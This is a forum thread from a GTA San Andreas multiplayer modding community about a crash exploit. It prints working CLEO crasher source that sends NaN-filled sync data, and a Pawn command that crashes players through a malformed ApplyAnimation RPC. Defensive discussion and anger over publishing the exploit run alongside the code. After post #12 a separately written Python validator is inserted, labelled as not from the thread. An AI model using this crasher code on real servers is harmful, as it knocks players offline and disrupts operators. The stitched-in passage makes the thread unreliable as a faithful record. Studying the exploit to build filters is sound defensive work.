anti crasher
#1

Code:
:RPC_INCOMING
0BE5: raknet 8@ = get_hook_param PARAM_PACKETID
IF 0039:   8@ == 19
THEN
    0BE5: raknet 8@ = get_hook_param PARAM_BITSTREAM
    0BE9: raknet bit_stream 8@ reset_read_pointer
    0BE7: raknet 16@ = bit_stream_read 8@ type BS_TYPE_FLOAT
    IF 0039:   16@ == 2143289344 // 0x7FC00000, the quiet-NaN bit pattern
    THEN
        0BE0: raknet hook_ret FALSE // drop the packet
    END
    0BE9: raknet bit_stream 8@ reset_read_pointer
END
IF 0039:   8@ == 86 // 0x56, ApplyAnimation
THEN
    0BE5: raknet 8@ = get_hook_param PARAM_BITSTREAM
    0BE9: raknet bit_stream 8@ reset_read_pointer
    0BE7: raknet 9@ = bit_stream_read 8@ type BS_TYPE_SHORT // WORD (PLAYER ID)
    0B2B: samp 10@ = get_player_id_by_actor_handle $PLAYER_ACTOR
    IF 003B:   10@ == 9@ // the animation targets the local player
    THEN
        0BE7: raknet 11@ = bit_stream_read 8@ type BS_TYPE_BYTE // animlib[strlen]
        0BE8: raknet bit_stream 8@ read_array 12@ size 11@ // animlib[char]
        0C1E: array 12@ element 11@ el_size 1 = 0 // null-terminate
        0BE7: raknet 13@ = bit_stream_read 8@ type BS_TYPE_BYTE // animname[strlen]
        0BE8: raknet bit_stream 8@ read_array 14@ size 13@ // animname[char]
        0C1E: array 14@ element 13@ el_size 1 = 0 // null-terminate
        0B59: samp 15@ = animation_id_by_name 14@ file 12@
        IF OR
            0039:   15@ == 37
            0039:   15@ == 39
            0039:   15@ == 589
        THEN
            0BE0: raknet hook_ret FALSE // drop the RPC
        END
    END
    0BE9: raknet bit_stream 8@ reset_read_pointer
END
0BE0: raknet hook_ret TRUE
END
0B43: samp cmd_ret

:SAYKISKA // 0AB1: call_scm_func @SAYKISKA 1 | ID |
0B20: samp 1@ = actor_handle_by_samp_player_id 0@
00A0: store_actor 1@ position_to 2@ 3@ 4@
0B2B: samp 5@ = get_player_id_by_actor_handle $PLAYER_ACTOR
0AC8: 6@ = allocate_memory_size 68
0BBA: samp store_player 5@ onfoot_data 6@
0C0D: struct 6@ offset 6 size 4 = 2@
0C0D: struct 6@ offset 10 size 4 = 3@
0C0D: struct 6@ offset 14 size 4 = 4@
0C0D: struct 6@ offset 18 size 4 = 0x07fc00000
0C0D: struct 6@ offset 22 size 4 = 0x07fc00000
0C0D: struct 6@ offset 26 size 4 = 0x07fc00000
0BC0: samp send_onfoot_data 6@
0AF9: samp say_msg "/crash %d" 0@
0C83: samp force_onfoot_sync
0AC9: free_allocated_memory 6@
0AB2: ret 0
This is the crasher source. Does anyone know how it works, and how can I make an anti-cheat for this crasher?

#2

anyone?

#3

This is the same as ApplyAnimation.
Quote:

An invalid animation library will crash the player's game

You can only intercept the RPC, but I don't know if it's possible to read it, run some tests and check whether everything is fine.

#4

This exploit is being used in many servers now. Any possible patch?

#5

Not sure how it works; mostly it looks like the old animation crasher, which sends an invalid animation index to other players to be synced, and the players without anticrasher.cs would crash.

If you have the full source, feel free to PM me and I will take a deep look.

#6

That is the full source.
Animation stuff (iirc) in ID_FOOT_SYNC is being sent as 0x07fc00000 (2143289344); not sure why such protection has not been added yet.

#7

Why'd you think it was a good idea to post the source of this?

This is wonderful for those who now want to crash servers........ SMH...

How has this stayed up for so long and not been pulled, or thought about....

#8

Quote:
Originally Posted by Sew_Sumi
Why'd you think it was a good idea to post the source of this?

This is wonderful for those who now want to crash servers........ SMH...

How has this stayed up for so long and not been pulled, or thought about....
Yes, remove the threads, don't provide a patch. Let the server owners deal with this exploit themselves.

#9

Quote:
Originally Posted by Whale
Yes, remove the threads, don't provide a patch. Let the server owners deal with this exploit themselves.
You do realize that if you post an exploit up on ANY dev forum YOU DON'T POST THE EXPLOIT SOURCE IN YOUR REPORT.......

Jesus, do you guys actually think at all?

Nothing to do with removing the thread, it's the fucking source code which is obviously something which is causing issue, which is now posted...

Thanks guys, for SPREADING the problem and making it so EVERY script kiddie and their mongrel dog, can pick up this shit, and start fucking over all your servers.

Like, seriously... Do you advertise to your neighbourhood that your side door lock is broken, and let all and sundry know, or do you get it fixed?

You get it fixed, because if you tell everyone, you'll end up being ripped off.....

If you think that posting the source is fine, then I'm thinking that you're a complete retard.

Quote:
Originally Posted by Whale
This exploit is being used in many servers now.
Quote:
Originally Posted by Whale
Yes, remove the threads, don't provide a patch. Let the server owners deal with this exploit themselves.
Hey, let's not remove the thread, or the source, and see how much more your server will crash thanks to the above who posted the source code of the crasher....

Wonderful idiocy there...

And to be clear...

Quote:
Originally Posted by Whale
Yes, remove the threads
I'm not an advocate for removing the thread, I'm an advocate for not posting source code for exploits so that every idiot can get it and use it.

All I'd have liked to have had is someone think if it was wise to even post it, as even if there are people who aren't being affected, now, if anyone doesn't like a server themselves, the tools provided in here make it so it's able to be attacked, thanks solely to the OP...

Now, OP, remove the source code so this can actually be a discussion, not just a source of the attack. Like, come on, what in the fuck were you thinking.....

#10

Quote:
Originally Posted by Freshncool
That is the full source.
Animation stuff (iirc) in ID_FOOT_SYNC are being sent 0x07fc00000 (2143289344) not sure why such protection has not been added yet.
Ya I've just happened to check it, you're right.

I've tested the above in multiple servers, which are 0.3.7 R2. Looks like 0.3.7 R2 is not affected.

#11

Quote:
Originally Posted by Sew_Sumi
You do realize that if you post an exploit up on ANY dev forum YOU DON'T POST THE EXPLOIT SOURCE IN YOUR REPORT.......
Alright, so others are supposed to "GUESS" the mechanism of the exploit? Or does the OP have to PM the code to every one of them here? Yes, I think it is a good idea that he posted it; the more mainstream the exploit becomes, the more important people here will consider patching this shit. Common f*kin sense right here buddy. Instead of criticism, how about looking into it and offering a patch? Contribute!

--OP, don't remove the source code, so kids can use it on other servers and the developers can create a hype to FIX this ASAP. Also, the code saves the effort of making assumptions and helps patch the exploit fast.

#12

Intercept the RPC, check the animation library and name or index if it is valid and if it is invalid, block it.

https://gtagmodding.com/forums/index.php?showtopic=35

Make an array of these, get the animation indexes of all of them and you have an array for valid animations.
The index of the array should be the animation ID as that is way more efficient than looping an array and comparing strings or IDs.

That's for an invalid animation index. But that is probably not all it does.

Quote:
Originally Posted by Whale
Alight, So Others are supposed to "GUESS" the mechanism of the exploit? Or does the OP has to Pm the code to every one of them here? Yes, I think this is good idea that he posted the more mainstream the exploit becomes the more important people here will consider to patch this shit. Common f*kin sense right here buddy.
Find out what exactly it does and how it works, then post that info instead of the source code.
If you must, talk to someone who's experienced enough to find that out before posting.
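The check NaS describes, modelled as an added example (not code from this thread, from SA-MP or from Pawn.RakNet): a Python parser for the ApplyAnimation RPC (0x56) payload that drops a request when the animation library is not on a whitelist, the name is empty, the delta float is not finite (the 0x7FC00000 pattern the hook in the first post tests for), or the payload is truncated. It assumes the field order from Dayrion's test command later in the thread and RakNet's uncompressed bit packing; SAFE_LIBS is a constructed partial list.

```python
import math, struct

# Constructed partial whitelist of GTA:SA animation libraries; a real server would load the full list instead.
SAFE_LIBS = {"PED", "DANCING", "CARRY", "GANGS"}

class BitStream:
    """RakNet-style uncompressed layout: MSB-first bits within each byte, little-endian values, 1-bit bools."""
    def __init__(self, data=b""):
        self.buf, self.wpos, self.rpos = bytearray(data), len(data) * 8, 0
    def write_bit(self, b):
        if self.wpos % 8 == 0: self.buf.append(0)
        self.buf[-1] |= (b & 1) << (7 - self.wpos % 8); self.wpos += 1
    def write(self, fmt, v):            # fmt is a struct code without byte order: B, H, I, f, Ns
        for byte in struct.pack("<" + fmt, v):
            for i in range(7, -1, -1): self.write_bit(byte >> i)
    def read_bit(self):
        if self.rpos >= self.wpos: raise ValueError("truncated")
        b = (self.buf[self.rpos >> 3] >> (7 - self.rpos % 8)) & 1
        self.rpos += 1; return b
    def read(self, fmt):                # after a 1-bit bool, later fields are no longer byte-aligned
        raw = bytearray()
        for _ in range(struct.calcsize(fmt)):
            v = 0
            for _ in range(8): v = (v << 1) | self.read_bit()
            raw.append(v)
        return struct.unpack("<" + fmt, raw)[0]

def encode_apply_animation(playerid, lib, name, delta=4.1, time_ms=1000):
    bs = BitStream()                    # sample RPC 0x56 payload, field order as in Dayrion's test command
    bs.write("H", playerid)
    for s in (lib, name): bs.write("B", len(s)); bs.write(f"{len(s)}s", s)
    bs.write("f", delta)
    for _ in range(4): bs.write_bit(0)  # loop, lockx, locky, freeze
    bs.write("I", time_ms)
    return bytes(bs.buf)

def check_apply_animation(payload):
    """Return None if the payload may be forwarded, otherwise the reason to drop it."""
    bs = BitStream(payload)
    try:
        bs.read("H")                                   # target playerid
        lib = bs.read(f"{bs.read('B')}s").decode("ascii", "replace")
        name = bs.read(f"{bs.read('B')}s").decode("ascii", "replace")
        delta = bs.read("f")
        [bs.read_bit() for _ in range(4)]; bs.read("I")  # flags, time
    except ValueError:
        return "truncated payload"
    if lib.upper() not in SAFE_LIBS: return f"unknown animlib {lib!r}"
    if not name.strip(): return "empty animname"
    if not math.isfinite(delta): return "non-finite delta"  # 0x7FC00000 is the quiet NaN the CLEO hook compares against
```

A server-side hook (for instance Pawn.RakNet's incoming-RPC callback) would apply the same checks and refuse to forward the RPC to other clients.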

#13

Quote:
Originally Posted by NaS
Intercept the RPC, check the animation library and name or index if it is valid and if it is invalid, block it.

https://gtagmodding.com/forums/index.php?showtopic=35

Make an array of these, get the animation indexes of all of them and you have an array for valid animations.
The index of the array should be the animation ID as that is way more efficient than looping an array and comparing strings or IDs.

That's for an invalid animation index. But that is probably not all it does.
...
I tried something similar and it didn't work. I sent an RPC with an invalid animation to the player. The player crashes and the RPC doesn't reach Pawn callbacks (using the Pawn.RakNet plugin).
Maybe I've done something wrong.

Code:
public OnIncomingPacket(playerid, packetid, BitStream:bs)
{
    if(packetid == 0xCF) // onfoot sync packet
    {
        new read_data[PR_OnFootSync];
        BS_ReadOnFootSync(bs, read_data);
        printf("[Inc. Packet 0xCF] Animation id: %i - Flags: %b (%i)", read_data[PR_animationId], read_data[PR_animationFlags], read_data[PR_animationFlags]);
    }
    return 1;
}
CMD:testrpcv(playerid)
{
    new BitStream:bs = BS_New();

    BS_WriteValue(bs,
        PR_UINT16, playerid,
        PR_UINT8, strlen(" "),
        PR_STRING, " ",
        PR_UINT8, strlen(" "),
        PR_STRING, " ",
        PR_FLOAT, 4.1,
        PR_BOOL, 0,
        PR_BOOL, 0,
        PR_BOOL, 0,
        PR_BOOL, 0,
        PR_UINT32, 1000);

    BS_RPC(bs, playerid, 0x56); // ApplyAnimation
    BS_Delete(bs);
    return 1;
}


#14

Quote:
Originally Posted by Dayrion
I tried something similar and it didn't work. I sent an RPC with an invalid animation to the player. The player crashes and the RPC doesn't reach Pawn callbacks (using the Pawn.RakNet plugin).
Maybe I've done something wrong.


Why would that RPC reach the server? It gets sent to the player which then cannot further distribute it since they crashed.

You'll need to send an invalid animation from the client to the server. Or, to test, apply an animation to the player that is valid. If it can be intercepted, it should also work for invalid ones.
Otherwise just use the exploit which should be the best way to test anyway.

Also I think you must ignore the first 8 bits for the info to be correct, since the packet identifier is not part of the enum.

#15

Quote:
Originally Posted by Whale
[1]Alright, so others are supposed to "GUESS" the mechanism of the exploit? Or does the OP have to PM the code to every one of them here? [2]Yes, I think it is a good idea that he posted it; the more mainstream the exploit becomes, the more important people here will consider patching this shit. [3]Common f*kin sense right here buddy. Instead of criticism, how about looking into it and offering a patch? Contribute!

[4]--OP, don't remove the source code, so kids can use it on other servers and the developers can create a hype to FIX this ASAP. Also, the code saves the effort of making assumptions and helps patch the exploit fast.
I'll highlight your 'points' and address them as follows...

1] Guess? No, you just have to realize that here on the forums, along with people who are scripting, and developing, there are also those who are looking for attacks, such as what would be put up in this scenario by someone who isn't thinking...

After all, there are ways of passing this info on, without releasing it to the general population....

This is why Google have bounties and the sort, so people pass the info to them, rather than using it against them. Now, we aren't going to have that here, but thing is, at least most people who know development and security, don't post source code of suspected exploits to the GENERAL POPULATION....

[2] It's actually very retarded, and completely selfish in this manner... You are DEMANDING something be fixed BY MAKING an exploit more known...

That's absolute retardation there by a country mile, and if you are a dev of ANY project, even your website where your 'code' is hosted, I hope it gets dropped to shit by a basic exploit, you lose everything, and you realize how this shit actually works.

[3] Common sense would be not to post up code for exploits, but hey, can't let that get in the way of demanding a patch, right?

Oh, and about that 'patch', the previous post before yours says that 0.3.7 R2 isn't affected, so if that's the case, no patch needed?

[4] Good job at showing your avoidance of any advice in regards to this, as thing is, that just shows you're ignorant as to others... After all, you do realise that by encouraging this (if it actually worked) then you're consigning many servers to being attacked, simply for what......

A patch, which you demand, and get all antsy about, just because someone who knows about the risks of having random people posting up random exploits to the general populace. Too bad for everyone else eh...

Think about that for a minute, and let that sink in...

How would you feel if you were just chilling out, scripting your shit gamemode, to find your server keeps crashing, and having no idea why it's happening...

Inconsiderate is only part of the phrase...

#16

Okay, I didn't read every line, so sorry if I misunderstood anything.

Agreed, it is risky. But if anyone is interested in studying cheats he could simply download the files and get a look into it without getting it here, with all these hacking communities around. Also, an exploit it is, but a fix would be worth taking the risk. Maybe this will all end up in a client update... and that'd be good!
Last but not least important is the fact that developers should talk and discuss everything related to their work to improve themselves and their craft every time.

#17

Errr, this isn't exactly just a hack... This was rumoured to crash the server, which is a little more serious than just hacking on a server...


And as I mentioned before, posting this out in an attempt to force an update (Or even glorifying this as a way to get a patch) is straight up stupid...

What if it ends up with someone just saying 'Fuck it, and fuck it all" and shuts down the whole mod? Then what?

Did you just fuck it all by that ideal?

#18

Guys guys, calm your tits! This shit won't work in R2. And most of the servers are R2 and above. Not a major exploit considering the current scenario.

#19

I don't mind bad words, but there is a consistent use of **** here.

#20

Quote:
Originally Posted by ShihabSoft
Guys guys, calm your tits! This shit won't work in R2. And most of the servers are R2 and above. Not a major exploit considering the current scenario.
It's the simple fact that by posting the source, they're not thinking of anyone else other than themselves.

It is also good that you've tested it, but I hope that you did that on your own server, not on other people's servers without advising the owners/admins.